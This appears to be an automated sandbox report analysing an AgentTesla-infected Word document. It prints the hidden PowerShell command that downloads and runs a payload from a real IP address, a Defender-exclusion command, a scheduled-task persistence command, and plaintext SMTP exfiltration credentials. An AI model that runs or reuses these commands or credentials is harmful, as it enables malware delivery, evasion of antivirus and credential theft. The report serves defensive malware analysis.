
Windows Analysis Report Reconfirm The Details.doc

Overview

General Information

Sample Name: Reconfirm The Details.doc
Analysis ID: 528737
MD5: 9a7ea1172bf1250005e0fefce04f604f
SHA1: 3df0782fc6ace41e15ca7c98277c79c128453d10
SHA256: 80071fbb7234239c46ced3c6f0fd9aa7dbeafe79d7bfeed7993d51a69c4da006
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (drops PE files)
Yara detected AgentTesla
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Tries to steal Mail credentials (via file / registry access)
Document contains OLE streams with names of living off the land binaries
Sigma detected: Change PowerShell Policies to a Unsecure Level
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Microsoft Office creates scripting files
Installs a global keyboard hook
Office process drops PE file
Injects files into Windows application
Tries to harvest and steal ftp login credentials
Bypasses PowerShell execution policy
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Sigma detected: Suspicius Add Task From User AppData Temp
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Sigma detected: Powershell Defender Exclusion
Found suspicious RTF objects
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sigma detected: Verclsid.exe Runs COM Object
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 236 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 1592 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • taskmg.exe (PID: 1156 cmdline: "C:\Users\user\AppData\Roaming\taskmg.exe" MD5: 815982590DE5E574ABB8A0310826E200)
        • powershell.exe (PID: 2924 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 1176 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • taskmg.exe (PID: 2784 cmdline: C:\Users\user\AppData\Roaming\taskmg.exe MD5: 815982590DE5E574ABB8A0310826E200)
    • powershell.exe (PID: 2804 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 2968 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • verclsid.exe (PID: 1200 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2856 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000003.00000002.423965866.0000000000400000.00000004.00000020.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
  • 0x326b:$sb1: -W Hidden
  • 0x325b:$sc1: -NoP
  • 0x3265:$sd1: -NonI
  • 0x3275:$se3: -ExecutionPolicy bypass
  • 0x3260:$sf1: -sta
00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
14.0.taskmg.exe.400000.13.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
14.0.taskmg.exe.400000.13.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
14.0.taskmg.exe.400000.9.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
14.0.taskmg.exe.400000.9.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
14.0.taskmg.exe.400000.11.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

System Summary:

Sigma detected: Change PowerShell Policies to a Unsecure Level
Source: Process started | Author: frack113 | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
Sigma detected: PowerShell DownloadFile
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started | Author: frack113 | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskmg.exe" , ParentImage: C:\Users\user\AppData\Roaming\taskmg.exe, ParentProcessId: 1156, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp, ProcessId: 1176
Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskmg.exe" , ParentImage: C:\Users\user\AppData\Roaming\taskmg.exe, ParentProcessId: 1156, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, ProcessId: 2924
Sigma detected: Verclsid.exe Runs COM Object
Source: Process started | Author: Victor Sergeev, oscd.community | Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 1200
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started | Author: James Pemberton / @4A616D6573 | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
Sigma detected: PowerShell Download from URL
Source: Process started | Author: Florian Roth, oscd.community, Jonhnathan Ribeiro | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592

Data Obfuscation:

Sigma detected: Powershell download and execute file
Source: Process started | Author: Joe Security | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 14.0.taskmg.exe.400000.13.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}
Multi AV Scanner detection for submitted file
Source: Reconfirm The Details.doc | ReversingLabs: Detection: 29%
Source: 14.0.taskmg.exe.400000.13.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.0.taskmg.exe.400000.9.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.0.taskmg.exe.400000.11.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.0.taskmg.exe.400000.5.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.0.taskmg.exe.400000.7.unpack | Avira: Label: TR/Spy.Gen8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBBX? source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbV> source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: taskmg[1].exe.0.dr
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exe
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 173.232.204.89:80
Source: global traffic | DNS query: name: us2.smtp.mailhostbox.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 173.232.204.89:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49167 -> 208.91.199.224:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49168 -> 208.91.199.225:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49169 -> 208.91.199.223:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49172 -> 208.91.199.224:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49173 -> 208.91.199.224:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49174 -> 208.91.198.143:587
Source: global traffic | HTTP traffic detected: GET /taskmg.exe HTTP/1.1 | Host: 173.232.204.89 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.19.9 | Date: Thu, 25 Nov 2021 17:14:54 GMT | Content-Type: application/octet-stream | Content-Length: 777216 | Last-Modified: Thu, 25 Nov 2021 03:51:30 GMT | Connection: keep-alive | ETag: "619f0842-bdc00" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.19.9 | Date: Thu, 25 Nov 2021 17:14:59 GMT | Content-Type: application/octet-stream | Content-Length: 777216 | Last-Modified: Thu, 25 Nov 2021 03:51:30 GMT | Connection: keep-alive | ETag: "619f0842-bdc00" | Accept-Ranges: bytes
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 